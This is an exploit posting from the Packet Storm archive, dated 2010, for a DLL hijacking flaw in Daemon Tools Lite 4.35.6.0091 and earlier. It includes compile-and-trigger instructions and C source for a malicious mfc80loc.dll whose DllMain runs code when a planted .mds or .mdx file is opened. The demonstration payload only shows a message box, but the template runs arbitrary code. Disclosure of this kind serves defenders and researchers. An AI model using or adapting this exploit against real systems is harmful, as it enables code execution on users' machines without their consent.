Daemon Tools Lite versions 4.35.6.0091 and below mfc80loc.dll DLL hijacking exploit.
77ef249904bd3ac9c7b90e298e229746/*
Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit
Found by: Christian Heinrich (cmlh)
Exploit by: Christian Heinrich (cmlh)
Email: christianheinrich@live.com
Web: http://www.twitter.com/cmlh
Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.
Description: Daemon Tools suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level through the .MDS and .MDX extensions.
----
Howto:
gcc -shared -o mfc80loc.dll daemontoolsexploit.c
Compile this file and rename to mfc80loc.dll
Then create an empty file named anything.msd or anything.mdx or you can create a
a legitimate image.
Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute
our code.
----
Tested on Microsoft Windows 7 / XP sp 3
Vulnerability discovered by Christian Heinrich (cmlh)
christianheinrich@live.com
27.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!